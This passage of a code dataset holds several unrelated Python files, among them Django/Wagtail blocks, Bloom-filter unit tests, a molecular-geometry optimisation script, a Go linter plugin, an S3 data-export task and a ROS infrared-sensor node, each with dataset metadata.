\"\"\"Test for the presence of docstrings in BaseModel methods\"\"\"\n for func in dir(City):\n with self.subTest(function=func):\n self.assertIsNot(\n func[1].__doc__,\n None,\n \"{:s} method needs a docstring\".format(func[0])\n )\n self.assertTrue(\n len(func[1].__doc__) > 1,\n \"{:s} method needs a docstring\".format(func[0])\n )\n\n def test_pep8(self):\n \"\"\" Test for pep8 stylecode \"\"\"\n msg = \"Found code style errors (and warning).\"\n style = pep8.StyleGuide(quiet=True)\n file_base = 'models/city.py'\n check = style.check_files([file_base])\n self.assertEqual(check.total_errors, 0, msg)\n\n def test_is_an_instance(self):\n '''check if my_city is an instance of BaseModel'''\n my_city = City()\n self.assertIsInstance(my_city, City)\n\n def test_permissions(self):\n \"\"\" Test for check the permissions \"\"\"\n read = os.access('models/city.py', os.R_OK)\n self.assertTrue(read)\n write = os.access('models/city.py', os.W_OK)\n self.assertTrue(write)\n exe = os.access('models/city.py', os.X_OK)\n self.assertTrue(exe)\n","sub_path":"tests/test_models/test_city.py","file_name":"test_city.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"173763258","text":"import string\n\nfrom django.template.loader import render_to_string\nfrom wagtail.wagtailcore.blocks.list_block import ListBlock\nfrom wagtail.wagtailcore.blocks.static_block import \\\n StaticBlock as WagtailStaticBlock\nfrom wagtail.wagtailcore.blocks.stream_block import \\\n StreamBlock as WagtailStreamBlock\n\n\nclass StreamBlock(WagtailStreamBlock):\n \"\"\"\n Same as the Wagtail StreamBlock with a 'props' key instead of 'value'.\n \"\"\"\n def get_api_representation(self, value, context=None):\n output = super().get_api_representation(value, context=context)\n if output:\n output = [{'type': item['type'], 'props': item['value']} for item in output]\n return output\n\n\nclass StaticBlock(WagtailStaticBlock):\n def value_from_datadict(self, data, files, prefix):\n return self.name\n\n\nclass FixedListBlock(ListBlock):\n \"\"\"\n Same as ListBlock except:\n - it has a fixed number of members (configurable)\n - members cannot be added/removed/ordered\n - members have a label == `

  • wrapper, hidden fields\n to manage ID/deleted state, delete/reorder buttons, and the child block's own form HTML.\n \"\"\"\n child = self.child_block.bind(value, prefix=\"%s-value\" % prefix, errors=errors)\n\n return render_to_string('wagtailadmin/block_forms/fixed_list_member.html', {\n 'prefix': prefix,\n 'child': child,\n 'index': index,\n 'label': '{} {}'.format(\n self.meta.members_label,\n string.ascii_uppercase[index or 0]\n )\n })\n\n class Meta:\n members_number = 2\n members_label = 'Area'\n","sub_path":"pages/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"68195799","text":"import os\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nfrom tqdm import tqdm\r\nimport argparse\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport scipy.spatial.distance as distance\r\nimport random\r\n\r\nINTERACTION_PATH = os.path.join(os.environ['HOME'],'Working/interaction/')\r\nsys.path.append(INTERACTION_PATH)\r\n\r\nfrom src.make import exec_gjf\r\nfrom src.vdw import vdw_R\r\nfrom src.utils import get_E\r\n\r\ndef init_process(args):\r\n # 数理モデル的に自然な定義の元のparams initリスト: not yet\r\n # 結晶学的に自然なパラメータへ変換: not yet\r\n auto_dir = args.auto_dir\r\n order = 5\r\n monomer_name = args.monomer_name\r\n \r\n os.makedirs(os.path.join(auto_dir,'gaussian'), exist_ok=True)\r\n os.makedirs(os.path.join(auto_dir,'gaussview'), exist_ok=True)\r\n\r\n def get_init_para_csv(auto_dir,monomer_name):\r\n step1_params_csv = os.path.join(INTERACTION_PATH, '{}/step1/step1_min.csv'.format(monomer_name))\r\n init_params_csv = os.path.join(auto_dir, 'step2-twist_init_params.csv')\r\n \r\n init_para_list = []\r\n# A1_list =[0]; A2_list = [1,2,3,4,26,27,28,29,31,32,33,34,36,37,38,39]\r\n A1_list =[-1,-2,-3,-4,-5,-6,-7,-8,-9,-10,-11,-12,-13,-14,-15,-16,-17,-18,-19,-20]; A2_list = [32]\r\n# A1_list =[0,-5,-10]; A2_list = [0,5,10,15,20,25,30,35,40]\r\n \r\n df_step1 = pd.read_csv(step1_params_csv)\r\n \r\n a_,b_,theta = df_step1.loc[df_step1[\"E\"].idxmin(),[\"a\",\"b\",\"theta\"]].values\r\n step1_para_zip = [[b_,a_,90-theta]]\r\n# print(step1_para_zip)\r\n# d = 5.5\r\n \r\n for a_,b_,theta in step1_para_zip:\r\n print('a,b,theta')\r\n print(a_,b_,theta)\r\n for A1 in tqdm(A1_list):\r\n for A2 in A2_list:\r\n if A1==0 and A2==0:\r\n continue\r\n a = a_# + 4 * d * abs(np.sin(np.radians(A1)))\r\n b = b_/np.cos(np.radians(A2))\r\n init_para_list.append([np.round(a,1),np.round(b,1),theta,A1,A2,'NotYet'])\r\n \r\n df_init_params = pd.DataFrame(np.array(init_para_list),columns = ['a','b','theta','A1','A2','status'])\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n get_init_para_csv(auto_dir,monomer_name)\r\n \r\n auto_csv_path = os.path.join(auto_dir,'step2-twist.csv')\r\n if not os.path.exists(auto_csv_path): \r\n df_E = pd.DataFrame(columns = ['a','b','theta','A1','A2','E','E_p','E_t','machine_type','status','file_name'])\r\n else:\r\n df_E = pd.read_csv(auto_csv_path)\r\n df_E = df_E[df_E['status']!='InProgress']\r\n df_E.to_csv(auto_csv_path,index=False)\r\n\r\n df_init=pd.read_csv(os.path.join(auto_dir,'step2-twist_init_params.csv'))\r\n df_init['status']='NotYet'\r\n df_init.to_csv(os.path.join(auto_dir,'step2-twist_init_params.csv'),index=False)\r\n\r\ndef main_process(args):\r\n os.chdir(os.path.join(args.auto_dir,'gaussian'))\r\n isOver = False\r\n while not(isOver):\r\n #check\r\n isOver = listen(args)\r\n time.sleep(1)\r\n\r\ndef listen(args):\r\n auto_dir = args.auto_dir\r\n monomer_name = args.monomer_name\r\n num_nodes = args.num_nodes\r\n isTest = args.isTest\r\n fixed_param_keys = ['A1','A2']\r\n opt_param_keys = ['a','b','theta']\r\n\r\n auto_csv = os.path.join(auto_dir,'step2-twist.csv')\r\n df_E = pd.read_csv(auto_csv)\r\n df_queue = df_E.loc[df_E['status']=='InProgress',['machine_type','file_name']]\r\n machine_type_list = df_queue['machine_type'].values.tolist()\r\n len_queue = len(df_queue)\r\n maxnum_machine2 = 3#num_nodes/2 if num_nodes%2==0 else (num_nodes+1)/2\r\n \r\n for idx,row in zip(df_queue.index,df_queue.values):\r\n machine_type,file_name = row\r\n log_filepath = os.path.join(*[auto_dir,'gaussian',file_name])\r\n if not(os.path.exists(log_filepath)):#logファイルが生成される直前だとまずいので\r\n continue\r\n E_list=get_E(log_filepath)\r\n if len(E_list)!=2:\r\n continue\r\n else:\r\n len_queue-=1;machine_type_list.remove(machine_type)\r\n Et=float(E_list[0]);Ep=float(E_list[1])\r\n E = 4*Et+2*Ep\r\n df_E.loc[idx, ['E_t','E_p','E','status']] = [Et,Ep,E,'Done']\r\n df_E.to_csv(auto_csv,index=False)\r\n break#2つ同時に計算終わったりしたらまずいので一個で切る\r\n isAvailable = len_queue < num_nodes \r\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\r\n machine_type = 1 if machine2IsFull else 2\r\n if isAvailable:\r\n params_dict = get_params_dict(auto_dir,num_nodes, fixed_param_keys, opt_param_keys)\r\n if len(params_dict)!=0:#終わりがまだ見えないなら\r\n alreadyCalculated = check_calc_status(auto_dir,params_dict)\r\n if not(alreadyCalculated):\r\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict,'cx':0,'cy':0,'cz':0}, machine_type,isInterlayer=False,isTest=isTest)\r\n df_newline = pd.Series({**params_dict,'E':0.,'E_p':0.,'E_t':0.,'machine_type':machine_type,'status':'InProgress','file_name':file_name})\r\n df_E=df_E.append(df_newline,ignore_index=True)\r\n df_E.to_csv(auto_csv,index=False)\r\n \r\n init_params_csv=os.path.join(auto_dir, 'step2-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_init_params_done = filter_df(df_init_params,{'status':'Done'})\r\n isOver = True if len(df_init_params_done)==len(df_init_params) else False\r\n return isOver\r\n\r\ndef check_calc_status(auto_dir,params_dict):\r\n df_E= pd.read_csv(os.path.join(auto_dir,'step2-twist.csv'))\r\n if len(df_E)==0:\r\n return False\r\n df_E_filtered = filter_df(df_E, params_dict)\r\n df_E_filtered = df_E_filtered.reset_index(drop=True)\r\n try:\r\n status = get_values_from_df(df_E_filtered,0,'status')\r\n return status=='Done'\r\n except KeyError:\r\n return False\r\n\r\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys):\r\n \"\"\"\r\n 前提:\r\n step2-twist_init_params.csvとstep2-twist.csvがauto_dirの下にある\r\n \"\"\"\r\n init_params_csv=os.path.join(auto_dir, 'step2-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step2-twist.csv'))\r\n df_init_params_inprogress = df_init_params[df_init_params['status']=='InProgress']\r\n \r\n #最初の立ち上がり時\r\n if len(df_init_params_inprogress) < num_nodes:\r\n df_init_params_notyet = df_init_params[df_init_params['status']=='NotYet']\r\n for index in df_init_params_notyet.index:\r\n df_init_params = update_value_in_df(df_init_params,index,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n return params_dict\r\n for index in df_init_params.index:\r\n df_init_params = pd.read_csv(init_params_csv)\r\n init_params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n fixed_params_dict = df_init_params.loc[index,fixed_param_keys].to_dict()\r\n isDone, opt_params_dict = get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict)\r\n if isDone:\r\n # df_init_paramsのstatusをupdate\r\n df_init_params = update_value_in_df(df_init_params,index,'status','Done')\r\n if np.max(df_init_params.index) < index+1:\r\n status = 'Done'\r\n else:\r\n status = get_values_from_df(df_init_params,index+1,'status')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n if status=='NotYet': \r\n opt_params_dict = get_values_from_df(df_init_params,index+1,opt_param_keys)\r\n df_init_params = update_value_in_df(df_init_params,index+1,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n return {**fixed_params_dict,**opt_params_dict}\r\n else:\r\n continue\r\n\r\n else:\r\n df_inprogress = filter_df(df_cur, {**fixed_params_dict,**opt_params_dict,'status':'InProgress'})\r\n if len(df_inprogress)>=1:\r\n continue\r\n return {**fixed_params_dict,**opt_params_dict}\r\n return {}\r\n \r\ndef get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict):\r\n df_val = filter_df(df_cur, fixed_params_dict)\r\n a_init_prev = init_params_dict['a']; b_init_prev = init_params_dict['b']; theta_init_prev = init_params_dict['theta']\r\n A1 = init_params_dict['A1']; A2 = init_params_dict['A2']\r\n \r\n while True:\r\n E_list=[];heri_list=[]\r\n for a in [a_init_prev-0.1,a_init_prev,a_init_prev+0.1]:\r\n for b in [b_init_prev-0.1,b_init_prev,b_init_prev+0.1]:\r\n a = np.round(a,1);b = np.round(b,1)\r\n for theta in [theta_init_prev-0.5,theta_init_prev,theta_init_prev+0.5]:\r\n df_val_ab = df_val[\r\n (df_val['a']==a)&(df_val['b']==b)&(df_val['theta']==theta)&\r\n (df_val['A1']==A1)&(df_val['A2']==A2)&\r\n (df_val['status']=='Done')\r\n ]\r\n if len(df_val_ab)==0:\r\n return False,{'a':a,'b':b,'theta':theta}\r\n heri_list.append([a,b,theta]);E_list.append(df_val_ab['E'].values[0])\r\n a_init,b_init,theta_init = heri_list[np.argmin(np.array(E_list))]\r\n if a_init==a_init_prev and b_init==b_init_prev and theta_init==theta_init_prev:\r\n return True,{'a':a_init,'b':b_init, 'theta':theta_init}\r\n else:\r\n a_init_prev=a_init;b_init_prev=b_init;theta_init_prev=theta_init\r\n\r\ndef get_values_from_df(df,index,key):\r\n return df.loc[index,key]\r\n\r\ndef update_value_in_df(df,index,key,value):\r\n df.loc[index,key]=value\r\n return df\r\n\r\ndef filter_df(df, dict_filter):\r\n query = []\r\n for k, v in dict_filter.items():\r\n if type(v)==str:\r\n query.append('{} == \"{}\"'.format(k,v))\r\n else:\r\n query.append('{} == {}'.format(k,v))\r\n df_filtered = df.query(' and '.join(query))\r\n return df_filtered\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument('--init',action='store_true')\r\n parser.add_argument('--isTest',action='store_true')\r\n parser.add_argument('--auto-dir',type=str,help='path to dir which includes gaussian, gaussview and csv')\r\n parser.add_argument('--monomer-name',type=str,help='monomer name')\r\n parser.add_argument('--num-nodes',type=int,help='num nodes')\r\n \r\n args = parser.parse_args()\r\n\r\n if args.init:\r\n print(\"----initial process----\")\r\n init_process(args)\r\n \r\n print(\"----main process----\")\r\n main_process(args)\r\n print(\"----finish process----\")\r\n ","sub_path":"src/step2-twist.py","file_name":"step2-twist.py","file_ext":"py","file_size_in_byte":11084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"612836043","text":"#\n# linter.py\n# Linter for SublimeLinter3, a code checking framework for Sublime Text 3\n#\n# Written by Jon Surrell and Jeremy Jay\n# Copyright (c) 2014 Jon Surrell\n#\n# License: MIT\n#\n\n\"\"\"This module exports the Golint plugin class.\"\"\"\n\nfrom SublimeLinter.lint import Linter, util, highlight, persist\nimport os\n\n\nclass Golint(Linter):\n\n \"\"\"Provides an interface to golint.\"\"\"\n\n syntax = ('go', 'gosublime-go')\n cmd = 'golint'\n regex = r'^.+:(?P\\d+):(?P\\d+):\\s+(?P.+)'\n tempfile_suffix = 'go'\n error_stream = util.STREAM_STDOUT\n default_type = highlight.WARNING\n\n def find_gopaths(self):\n \"\"\" search for potential GOPATHs. \"\"\"\n # collect existing Go path info\n goroot = set(os.path.normpath(s) for s in os.environ.get('GOROOT', '').split(os.pathsep))\n gopath = set(os.path.normpath(s) for s in os.environ.get('GOPATH', '').split(os.pathsep))\n if '.' in gopath:\n gopath.remove('.')\n gopath = list(gopath)\n\n # search for potential GOPATHs upstream from filename\n # (reversed to ensure deepest path is first searched)\n dirparts = os.path.dirname(self.filename).split(os.sep)\n for i in range(len(dirparts) - 1, 1, -1):\n if dirparts[i].lower() != \"src\":\n continue\n p = os.path.normpath(os.sep.join(dirparts[:i]))\n if p not in goroot and p not in gopath:\n gopath.append(p)\n\n if persist.debug_mode():\n persist.printf(\"{}: {} {}\".format(self.name,\n os.path.basename(self.filename or ''),\n \"guessed GOPATH=\" + os.pathsep.join(gopath)))\n\n return os.pathsep.join(gopath)\n\n def run(self, cmd, code):\n \"\"\" transparently add potential GOPATHs before running. \"\"\"\n self.env = {'GOPATH': self.find_gopaths()}\n\n # copy debug output from Linter.run()\n if persist.debug_mode():\n persist.printf('{}: {} {}'.format(self.name,\n os.path.basename(self.filename or ''),\n cmd or ''))\n\n return self.tmpfile(cmd, code, suffix=self.get_tempfile_suffix())\n","sub_path":"linter.py","file_name":"linter.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"607174371","text":"#!/usr/bin/env python\n\nimport unittest\nimport StringIO\n\nfrom rnabloom.utils import graph_utils as gu\nfrom rnabloom.bloom import bloom_filters as bf\n\nclass NumBitsTestCase(unittest.TestCase):\n def setUp(self):\n pass\n #enddef\n \n def test_get_num_bits(self):\n self.assertEqual(8000, gu._get_num_bits('1k'))\n self.assertEqual(8000000, gu._get_num_bits('1M'))\n self.assertEqual(8000000000, gu._get_num_bits('1G'))\n self.assertEqual(8000000000000, gu._get_num_bits('1T'))\n #enddef\n#endclass\n\nclass NumNeighborsTestCase(unittest.TestCase):\n def setUp(self):\n self.bloomfilter = bf.EvenLengthBloomFilter(8000)\n # populate the bf\n self.bloomfilter.add('TACAAA') # predecessor 1\n self.bloomfilter.add('GACAAA') # predecessor 2\n self.bloomfilter.add('ACAAAG')\n self.bloomfilter.add('CAAAGT') # successor 1\n self.bloomfilter.add('CAAAGG') # successor 2\n #enddef\n\n def test_count_predecessors(self):\n self.assertEqual(2, gu._count_predecessors('ACAAAG', self.bloomfilter, strand_specific=True))\n #enddef\n \n def test_count_successors(self):\n self.assertEqual(2, gu._count_successors('ACAAAG', self.bloomfilter, strand_specific=True))\n #enddef\n#endclass\n\nclass PopulateBloomFiltersTestCase(unittest.TestCase):\n def setUp(self):\n self.l1_bf = bf.BloomFilter(8000, 4)\n # populate the bf\n self.l1_bf.add('TACAAA') # predecessor 1\n self.l1_bf.add('GACAAA') # predecessor 2\n self.l1_bf.add('ACAAAG')\n self.l1_bf.add('CAAAGT') # successor 1\n self.l1_bf.add('CAAAGG') # successor 2 \n \n self.l2_bf = bf.EvenLengthBloomFilter(8000)\n # populate the bf\n self.l2_bf.add('TACAAA') # predecessor 1\n self.l2_bf.add('GACAAA') # predecessor 2\n self.l2_bf.add('ACAAAG')\n self.l2_bf.add('CAAAGT') # successor 1\n self.l2_bf.add('CAAAGG') # successor 2\n #enddef\n \n def test_populate_bloom_filters_forward(self):\n lines = ['>1', 'TTTTACAAA', '>2', 'TTTTACAAA']\n stream = StringIO.StringIO('\\n'.join(lines))\n \n gu._populate_bloom_filters(stream, forward=True, k=6, strand_specific=True,\n screening_bf=self.l1_bf, evenlength_bf=self.l2_bf,\n initial_blunt_kmers=set(), blunt_kmers=set(), branch_kmers=set())\n\n self.assertTrue(self.l1_bf.lookup('TTTTAC'))\n self.assertTrue(self.l1_bf.lookup('TTTACA'))\n self.assertTrue(self.l1_bf.lookup('TTACAA'))\n self.assertTrue(self.l1_bf.lookup('TACAAA'))\n \n self.assertTrue(self.l2_bf.lookup('TTTTAC'))\n self.assertTrue(self.l2_bf.lookup('TTTACA'))\n self.assertTrue(self.l2_bf.lookup('TTACAA'))\n self.assertTrue(self.l2_bf.lookup('TACAAA'))\n #enddef\n \n def test_populate_bloom_filters_backward(self):\n lines = ['>1', 'TTTTACAAA', '>2', 'TTTTACAAA']\n stream = StringIO.StringIO('\\n'.join(lines))\n \n gu._populate_bloom_filters(stream, forward=False, k=6, strand_specific=True,\n screening_bf=self.l1_bf, evenlength_bf=self.l2_bf,\n initial_blunt_kmers=set(), blunt_kmers=set(), branch_kmers=set())\n \n self.assertTrue(self.l1_bf.lookup('GTAAAA'))\n self.assertTrue(self.l1_bf.lookup('TGTAAA'))\n self.assertTrue(self.l1_bf.lookup('TTGTAA'))\n self.assertTrue(self.l1_bf.lookup('TTTGTA'))\n \n self.assertTrue(self.l2_bf.lookup('GTAAAA'))\n self.assertTrue(self.l2_bf.lookup('TGTAAA'))\n self.assertTrue(self.l2_bf.lookup('TTGTAA'))\n self.assertTrue(self.l2_bf.lookup('TTTGTA'))\n #enddef\n#endclass\n\nclass MakeDBGTestCase(unittest.TestCase):\n def setUp(self):\n self.seq1 = 'ATCGGTCGGAGACCCTTTAGCTTTAG'\n self.seq2 = 'ATCGGTCGGTTACCCTTTAGCTTTAG'\n self.lines = ['>1', self.seq1,\n '>2', self.seq2,\n '>3', self.seq1,\n '>4', self.seq2]\n self.k10_ctgs = set(['ATCGGTCGGAGACCCTTTAG',\n 'ATCGGTCGGTTACCCTTTAG',\n 'ACCCTTTAGCTTTAG'])\n #enddef\n \n def test_assembly(self):\n bfdbg = gu.make_2k_bf_dbg(fastq1_stream=StringIO.StringIO('\\n'.join(self.lines)), fastq2_stream=None, forward1=True, forward2=False, k=10, strand_specific=True, screening_bf_size='10M', dbg_bf_size='50M')\n \n \"\"\"\n print 'seq 1: '+ self.seq1\n print 'seq 2: '+ self.seq2\n print 'tips: '+ str(bfdbg.blunt_kmers)\n print 'branches: '+ str(bfdbg.branch_kmers)\n print 'cycles?: '+ str(bfdbg.initial_blunt_kmers)\n \"\"\"\n \n assembled_seqs = set()\n for ctg in gu.assemble_unambiguous_paths(bfdbg, screening_bf_size='10M'):\n assembled_seqs.add(ctg.split('\\n')[1])\n #endfor\n \n self.assertEqual(assembled_seqs, self.k10_ctgs)\n #enddef\n#endclass\n\nif __name__ == \"__main__\":\n unittest.main()\n#endif\n","sub_path":"tests/test_utils/test_graph_utils.py","file_name":"test_graph_utils.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"510248746","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport logging\nimport unicodecsv\nimport io\nimport boto3\nimport re\nimport dpath.util\nfrom collections import OrderedDict\nfrom .. import API, env\nfrom ..time import Time\n\nSCHOOL_SYNC_SKIP_FIELDS = (\n 'created',\n 'creator',\n 'description',\n 'id',\n 'name',\n 'organizationType',\n 'pending',\n 'schoolType',\n)\n\nEXPEDITION_EXPORT_KEY = 'reports/expeditions-full.tsv'\nEXPEDITION_DATA_EXPORT_FIELDS = [\n '_id',\n 'monitoringStartDate',\n 'name',\n 'team.schoolOrg.name',\n 'team.name',\n 'station.name',\n 'protocols.siteCondition.meteorologicalConditions.airTemperatureC',\n 'protocols.siteCondition.meteorologicalConditions.weatherConditions',\n 'protocols.siteCondition.meteorologicalConditions.windSpeedMPH',\n 'protocols.siteCondition.meteorologicalConditions.windDirection',\n 'protocols.siteCondition.humidity',\n 'protocols.siteCondition.recentRainfall.rainedIn24Hours',\n 'protocols.siteCondition.recentRainfall.rainedIn72Hours',\n 'protocols.siteCondition.recentRainfall.rainedIn7Days',\n 'protocols.siteCondition.tideConditions.referencePoint',\n 'protocols.siteCondition.tideConditions.tidalCurrent',\n 'protocols.siteCondition.tideConditions.closestHighTideHeight',\n 'protocols.siteCondition.tideConditions.closestHighTide',\n 'protocols.siteCondition.tideConditions.closestLowTideHeight',\n 'protocols.siteCondition.tideConditions.closestLowTide',\n 'protocols.siteCondition.waterConditions.surfaceCurrentSpeedMPS',\n 'protocols.siteCondition.waterConditions.oilSheen',\n 'protocols.siteCondition.waterConditions.garbage.garbagePresent',\n 'protocols.siteCondition.pipes',\n 'protocols.siteCondition.landConditions.shoreLineType',\n 'protocols.siteCondition.landConditions.garbage.garbagePresent',\n 'protocols.siteCondition.landConditions.shorelineSurfaceCoverEstPer.imperviousSurfacePer',\n 'protocols.siteCondition.landConditions.shorelineSurfaceCoverEstPer.perviousSurfacePer',\n 'protocols.siteCondition.landConditions.shorelineSurfaceCoverEstPer.vegetatedSurfacePer',\n 'protocols.oysterMeasurement.depthOfOysterCage.submergedDepthofCageM',\n 'protocols.oysterMeasurement.conditionOfOysterCage.bioaccumulationOnCage',\n 'protocols.oysterMeasurement.conditionOfOysterCage.notesOnDamageToCage',\n 'protocols.oysterMeasurement.maximumSizeOfAllLiveOysters',\n 'protocols.oysterMeasurement.minimumSizeOfAllLiveOysters',\n 'protocols.mobileTrap.organism',\n 'protocols.settlementTiles.*.grid*.organism',\n 'protocols.waterQuality.depth',\n 'protocols.waterQuality.temperature',\n 'protocols.waterQuality.dissolvedOxygen',\n 'protocols.waterQuality.salinity',\n 'protocols.waterQuality.ph',\n 'protocols.waterQuality.turbidity',\n 'protocols.waterQuality.ammonia',\n 'protocols.waterQuality.nitrates',\n 'protocols.waterQuality.other',\n]\n\n\ndef sync_prospective_to_orgs():\n \"\"\"\n Synchronizes certain fields from the \"prospectiveorgs\" table into the corresponding records in\n the \"schoolorgs\" table. This process allows changes made to prospectiveorgs by other\n processes (e.g.: syncing from third-party data sources) to propagate to existing organizations.\n \"\"\"\n instance = API('bop-worker')\n schoolOrgs = instance.db.collection('schoolorgs')\n prospectiveOrgs = instance.db.collection('prospectiveorgs')\n\n # for each school-org in the database...\n for school in schoolOrgs.query('all', limit=False):\n if school.syncId:\n has_changed = False\n\n prospectiveOrg = prospectiveOrgs.query('syncId/{}'.format(school.syncId), limit=1)\n\n for k, v in school.items():\n if k in SCHOOL_SYNC_SKIP_FIELDS:\n continue\n\n if k in prospectiveOrg:\n if school[k] != prospectiveOrg[k]:\n has_changed = True\n school[k] = prospectiveOrg[k]\n\n if has_changed:\n logging.info('Synced: {} ({})'.format(school.id, school.name))\n schoolOrgs.update(school)\n else:\n logging.info('Unchanged: {}'.format(school.id))\n\n\ndef generate_batch_expeditions_tsv():\n api = API('bop-worker')\n api.setup()\n s3 = boto3.client('s3')\n\n bucket = env.get_reports_bucket()\n s3.head_bucket(Bucket=bucket)\n\n data = []\n\n expeditions = api.db.collection('expeditions').query(\n 'status/published',\n limit=False,\n sort=['monitoringStartDate']\n )\n\n teams = dict([\n (record.id, dict(record)) for record in api.db.collection('teams').all(\n limit=False\n )\n ])\n\n stations = dict([\n (record.id, dict(record)) for record in api.db.collection('restorationstations').all(\n limit=False\n )\n ])\n\n organizations = dict([\n (record.id, dict(record)) for record in api.db.collection('schoolorgs').all(\n limit=False\n )\n ])\n\n p1siteConditions = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolsiteconditions').all(\n limit=False\n )\n ])\n\n p2oysterMeasurements = dict([\n (record.id, dict(record)) for record in api.db.collection('protocoloystermeasurements').all(\n limit=False\n )\n ])\n\n p3mobileTraps = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolmobiletraps').all(\n limit=False\n )\n ])\n\n p4settlementTiles = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolsettlementtiles').all(\n limit=False\n )\n ])\n\n p5waterQuality = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolwaterqualities').all(\n limit=False\n )\n ])\n\n prefixes = {\n 'team': teams,\n 'station': stations,\n 'team.schoolOrg': organizations,\n 'protocols.siteCondition': p1siteConditions,\n 'protocols.oysterMeasurement': p2oysterMeasurements,\n 'protocols.mobileTrap': p3mobileTraps,\n 'protocols.settlementTiles': p4settlementTiles,\n 'protocols.waterQuality': p5waterQuality,\n }\n\n for expedition in expeditions:\n record = OrderedDict()\n expeditionDict = dict(expedition)\n\n for field in EXPEDITION_DATA_EXPORT_FIELDS:\n try:\n if field == '_id':\n record['_id'] = expedition.id\n\n elif field == 'team.schoolOrg.name':\n team = teams[expeditionDict['team']]\n org = organizations[team['schoolOrg']]\n record[field] = org['name']\n\n elif '.' not in field:\n record[field] = expedition.get(field)\n\n else:\n for prefix, results in prefixes.items():\n results = prefixes[prefix]\n trimmedPrefix = re.sub(r'^{}\\.'.format(prefix), '', field)\n\n if field.startswith(prefix + '.'):\n subItemId = dpath.util.get(expeditionDict, prefix, separator='.')\n\n if not subItemId:\n subItemId = dpath.util.get(record, prefix, separator='.')\n\n try:\n nestedDataItem = results[subItemId]\n except KeyError:\n nestedDataItem = None\n\n if not nestedDataItem:\n nestedDataItem = {}\n\n if len(nestedDataItem):\n record[field] = dpath.util.get(\n nestedDataItem,\n trimmedPrefix,\n separator='.'\n )\n\n except KeyError:\n pass\n\n if field not in record:\n record[field] = None\n\n data.append(record)\n\n output = io.BytesIO()\n writer = unicodecsv.DictWriter(\n output,\n fieldnames=EXPEDITION_DATA_EXPORT_FIELDS,\n dialect='excel-tab'\n )\n\n writer.writeheader()\n\n for record in data:\n writer.writerow(record)\n\n output.seek(0)\n\n # upload the exported file, overwriting the existing copy\n s3.put_object(\n ACL='public-read',\n Bucket=bucket,\n Key=EXPEDITION_EXPORT_KEY,\n ContentType='text/tab-separated-values',\n StorageClass='REDUCED_REDUNDANCY',\n Body=output,\n Metadata={\n 'GeneratedAt': '{}'.format(Time()),\n },\n )\n","sub_path":"backend/bop/tasks/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"442604395","text":"#!/usr/bin/env python\nimport rospy\nimport random\nfrom std_msgs.msg import UInt16\nfrom std_msgs.msg import Float32\n\n# This node \"left_error_node\" subscribes to the left IR sensor, converts that value \n# to a measurement in inches. Then it publishes the error found from the desired \n# minimum to the topic \"left_error\".\n\n# function: left_ir_to_error\n# purpose:\n# 1) Read in values from the left ir publishers \"left_ir\".\n# 2) Convert that value to a inches measurment using converts ir to in float 5357.5113406476 x^(-1.0171714166).\n# 3) Subtract that measurement from the minimum which will be 12 inches. If the subtraction shows\n# the value to be greater than 0 coerce it to 0. Regardless add 1.\n# 4) Take the inverse and bring it to some power, I think 1 will work for now.\n\ndef left_ir_to_error(data):\n min_distance = 12\n # value from sensor\n sensor_read = data.data\n # if the value read in was a 0 will set the effort small by making a large read value\n left_ir_read = 0\n if sensor_read > 0:\n # reading and convertin the value\n left_ir_read = 5357.5113406746*pow(sensor_read,-1.0171714166)\n else:\n left_ir_read = 1000\n # coercing the value if it is less than the minimum\n if min_distance > left_ir_read:\n left_ir_read = min_distance\n # taking the inverse\n left_ir_read = 1.0/(-pow(abs(min_distance - left_ir_read - 1),1/(0.5 + random.random())))\n # publishing the result\n errorL.publish(left_ir_read)\n\n# function: start\n# purpose:\n# 1) Initialize the global variable for the publisher\n# 2) Initialize the publisher and set the topic name for the publisher to \"left_error\"\n# this value will be of the Float32 type, and set the que size to 10\n# 3) Initialize the node publishing the topic \"left_error\". The node's name is \"left_error_node\".\n# 4) Set the update rate to be the same as the rate information is coming in.\ndef start():\n # erroL is the publisher\n global errorL\n # errorL is the publishing node\n errorL = rospy.Publisher('left_error', Float32, queue_size=10)\n # starting the node \n rospy.init_node('left_error_node',anonymous=True)\n # subscribing to the left ir topic\n rospy.Subscriber('left_ir', UInt16, left_ir_to_error)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n start()\n except rospy.ROSInterruptException:\n 